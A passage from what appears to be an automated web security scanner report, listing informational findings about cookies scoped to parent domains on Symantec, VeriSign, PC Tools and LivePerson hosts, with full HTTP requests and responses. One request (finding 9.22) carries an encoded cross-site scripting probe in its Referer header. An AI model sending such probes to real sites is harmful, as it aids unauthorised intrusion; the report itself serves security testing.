HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:38:21 GMT Location: http://buy.symanteccloud.com/estore/mf/smbEmailTrialPage?sfid=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439!1315604301412 Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: JSESSIONID=LsGRTqHN43HsnsxPPpQZP3Tj9CJ21WWwv1yRwH0vnzd82cf97GNT!334566439; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close Content-Length: 471 <html><head><title>302 Moved 
Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.symanteccloud.com/estor...[SNIP]...
9.21. http://buy.symanteccloud.com/smbstore
Summary
Severity: Information
Confidence: Certain
Host: http://buy.symanteccloud.com
Path: /smbstore
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /smbstore HTTP/1.1 Host: buy.symanteccloud.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:38:21 GMT Location: http://buy.symanteccloud.com/estore/mf/smbHomePage?sfid=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439!1315604301665 Set-Cookie: COUNTRY=US; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LANGUAGE=en; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAMID=; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: FIRSTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=buy.symanteccloud.com; expires=Thursday, 01-Jan-1970 01:00:00 GMT Set-Cookie: COUNTRY=US; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LANGUAGE=en; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAMID_CREATED_DATE=09-09-2011; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: PROGRAMID=; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/Set-Cookie: PROGRAM_TYPE=UNKNOWN; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: LASTTIME_CV_DATE=Sep-09-2011 14:38:21; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: TrafficSourceCookieName=other; domain=.symanteccloud.com; expires=Saturday, 08-Sep-2012 21:38:21 GMT; path=/ Set-Cookie: JSESSIONID=BcWpTqHN0cLLbNtj50T02T9jsChhh86cK9wmykNgQsTJZ1p4QRP9!334566439; path=/; HttpOnly X-Powered-By: Servlet/2.5 JSP/2.1 Connection: close Content-Length: 459 <html><head><title>302 Moved 
Temporarily</title></head> <body bgcolor="#FFFFFF"> <p>This document you requested has moved temporarily.</p> <p>It's now at <a href="http://buy.symanteccloud.com/estor...[SNIP]...
9.22. http://free.pctools.com/res/js/utils.php
Summary
Severity: Information
Confidence: Certain
Host: http://free.pctools.com
Path: /res/js/utils.php
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
referrer=deleted; expires=Thu, 09-Sep-2010 21:01:50 GMT; path=/; domain=.pctools.com
reftrack=freesite%2320110909170147; expires=Sat, 08-Sep-2012 21:01:51 GMT; path=/; domain=.pctools.com
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /res/js/utils.php HTTP/1.1 Host: free.pctools.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://free.pctools.com/free-antivirus36661%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E55a70ea0c85/ Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.3.4 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Fri, 09 Sep 2011 22:05:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Sep 2011 22:05:27 GMT Connection: close Vary: Accept-Encoding Set-Cookie: referrer=deleted; expires=Thu, 09-Sep-2010 21:01:50 GMT; path=/; domain=.pctools.com Set-Cookie: reftrack=freesite%2320110909170147; expires=Sat, 08-Sep-2012 21:01:51 GMT; path=/; domain=.pctools.com
9.23. http://mbox3.offermatica.com/m2/verisign/mbox/standard
Summary
Severity: Information
Confidence: Certain
Host: http://mbox3.offermatica.com
Path: /m2/verisign/mbox/standard
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_2011&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1 Host: mbox3.offermatica.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: mboxPC=1315621455064-973488.19
Response
HTTP/1.1 200 OK P3P: CP="NOI DSP CURa OUR STP COM" Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:24:38 GMT; Path=/m2/verisign Content-Type: text/javascript Content-Length: 154 Date: Fri, 09 Sep 2011 21:24:37 GMT Server: Test & Target mboxFactoryDefault.get('VRSN_HP_AccBox_2011',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");
9.24. http://sales.liveperson.net/hc/2735064/
Summary
Severity: Information
Confidence: Certain
Host: http://sales.liveperson.net
Path: /hc/2735064/
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /hc/2735064/?&site=2735064&cmd=mTagStartPage&lpCallId=480831184191-637837637215&protV=20&lpjson=1&page=http%3A//buy.norton.com/estore/mf/landingProductFeatures%3Frdid%3D8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013&id=3141287025&javaSupport=true&visitorStatus=INSITE_STATUS&defInvite=chat-norton-estore-us-english&activePlugin=none&cobrowse=true&PV%21unit=norton-estore-us&PV%21iproducts=na&PV%21offered_sku_desc_int=na&PV%21pagename=store%3Aus%3Ahho%20mf%3Ahomepage%3Ahomepage&PV%21ucproduct=na&PV%21offered_sku_desc=na&PV%21billingerror=false&PV%21pageLoadTime=1%20sec&PV%21visitorActive=1&SV%21language=english&SV%21traffic_source=store%3Atrf_id%3Asymcom&SV%21current_subchannel=store%3Aonline%20%281st%29&SV%21language=en&SV%21site_id=store%3Aus&SV%21country=us&SV%21incoming_productSKU=&SV%21session_guid=359A5BC1-187B-E37B-9025-A486DEF7EF50&SV%21partner=store%3Asymantec&title=Norton%20Security%20-%20Antivirus%20Software%20%7C%20Norton%20Store&referrer=http%3A//www.symantec.com/business/verisign/fraud-detection-service%3Ftid%3Dgnps&cobrowse=true HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://buy.norton.com/estore/mf/landingProductFeatures?rdid=8504bbeb-1b35-477e-abfe-b3f645ab12841315603878013 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=3716944001314187740; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603882871
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:25 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: LivePersonID=-5110247826455-1315603885:0; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net Set-Cookie: HumanClickKEY=3716944001314187740; path=/hc/2735064 Set-Cookie: HumanClickSiteContainerID_2735064=STANDALONE; path=/hc/2735064 Set-Cookie: LivePersonID=-5110247826455-1315603885:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:31:25 GMT; path=/hc/2735064; domain=.liveperson.net Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:31:25 GMT Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 1998 lpConnLib.Process({"ResultSet": {"lpCallId":"480831184191-637837637215","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton...[SNIP]...
9.25. http://sales.liveperson.net/hc/71097838/
Summary
Severity: Information
Confidence: Certain
Host: http://sales.liveperson.net
Path: /hc/71097838/
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:26:59 GMT; path=/hc/71097838; domain=.liveperson.net
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hc/71097838/?&site=71097838&cmd=mTagKnockPage&lpCallId=361431335564-444301943760&protV=20&lpjson=1&id=2131228943&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-sales-business-english%7Cnull%7Cchat-ButtonDiv%7C%23chat-sales-business-english-bullet%7Cnull%7Cchat-ButtonDiv-bullet%7C%23voice-sales-business-english%7Cnull%7Cvoice-ButtonDiv%7C%23voice-sales-business-english-bullet%7Cnull%7Cvoice-ButtonDiv-bullet%7C HTTP/1.1 Host: sales.liveperson.net Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/products/downloads/index.jsp User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: HumanClickKEY=6491552338753675901; HumanClickSiteContainerID_71097838=Master; LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315603612650
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:59 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Set-Cookie: HumanClickACTIVE=1315603619835; expires=Sat, 10-Sep-2011 21:26:59 GMT; path=/ Content-Type: application/x-javascript Accept-Ranges: bytes Last-Modified: Fri, 09 Sep 2011 21:26:59 GMT Set-Cookie: HumanClickSiteContainerID_71097838=Master; path=/hc/71097838 Set-Cookie: LivePersonID=-5110247826455-1315603614:-1:-1:-1:-1; expires=Sat, 08-Sep-2012 21:26:59 GMT; path=/hc/71097838; domain=.liveperson.net Cache-Control: no-store Pragma: no-cache Expires: Wed, 31 Dec 1969 23:59:59 GMT Content-Length: 33062 lpConnLib.Process({"ResultSet": {"lpCallId":"361431335564-444301943760","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n...[SNIP]...
9.26. https://ssl-certificate-center.verisign.ch/process/retail/console_login
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:42 GMT Server: Apache Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11755 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
9.27. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.ch
Path:
/process/retail/production_trial_initial
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH HTTP/1.1 Host: ssl-certificate-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:42 GMT Server: Apache Set-Cookie: TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://ssl-certificate-center.verisign.ch/process/retail/production_trial_product_selector?uid=fb69022a800687aee2281387e3be2beb&product=GHAPT001 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
9.28. https://ssl-certificate-center.verisign.com/process/retail/console_login
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:43 GMT Server: Apache Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11759 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
9.29. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/production_trial_initial
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/production_trial_initial HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:44 GMT Server: Apache Set-Cookie: TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://ssl-certificate-center.verisign.com/process/retail/production_trial_product_selector?uid=21e134a09c6b802996d1066fe9c13ef5&product=GSPT001 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
9.30. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial
Summary
Severity:
Information
Confidence:
Certain
Host:
https://ssl-certificate-center.verisign.com
Path:
/process/retail/trustseal_trial_initial
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trustseal_trial_initial HTTP/1.1 Host: ssl-certificate-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:45 GMT Server: Apache Set-Cookie: TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_new_account?uid=9e535ad90e202dd2be1657e6ee2caf70&product=TRUSTSEALTRIAL Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
9.31. https://trust-center.verisign.ch/process/retail/console_login
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.ch
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:46 GMT Server: Apache Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 11715 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
9.32. https://trust-center.verisign.ch/process/retail/trust_initial
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.ch
Path:
/process/retail/trust_initial
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/trust_initial HTTP/1.1 Host: trust-center.verisign.ch Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Moved Temporarily Date: Fri, 09 Sep 2011 21:46:46 GMT Server: Apache Set-Cookie: TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Location: https://trust-center.verisign.ch/process/retail/trust_product_selector?uid=2f451e38320cb4cf9a868171c06fe1c9&product=TRUSTSEAL001 Content-Length: 0 Vary: Accept-Encoding Connection: close Content-Type: text/html
9.33. https://trust-center.verisign.com/favicon.ico
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/favicon.ico
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: trust-center.verisign.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:45 GMT Server: ApacheSet-Cookie: TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com Last-Modified: Fri, 27 May 2011 21:56:07 GMT Accept-Ranges: bytes Vary: Accept-Encoding Content-Length: 4710 Keep-Alive: timeout=15, max=100 Connection: Keep-Alive Content-Type: image/x-icon ...... ..........F... ......................h...............(...>...(... ...@....................................... ................. !....)...9.'&'.(*&.)*(.44-.=?8.BC?...U...]...a. d...i. .h......[SNIP]...
9.34. https://trust-center.verisign.com/process/retail/console_login
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/console_login
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/console_login HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:46:48 GMT Server: Apache Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com Cache-Control: no-cache Expires: Thu, 01 Dec 1994 16:00:00 GMT X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0 Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=utf-8 Content-Length: 12062 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF...[SNIP]...
9.35. https://trust-center.verisign.com/process/retail/help_and_support
Summary
Severity:
Information
Confidence:
Certain
Host:
https://trust-center.verisign.com
Path:
/process/retail/help_and_support
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /process/retail/help_and_support HTTP/1.1 Host: trust-center.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
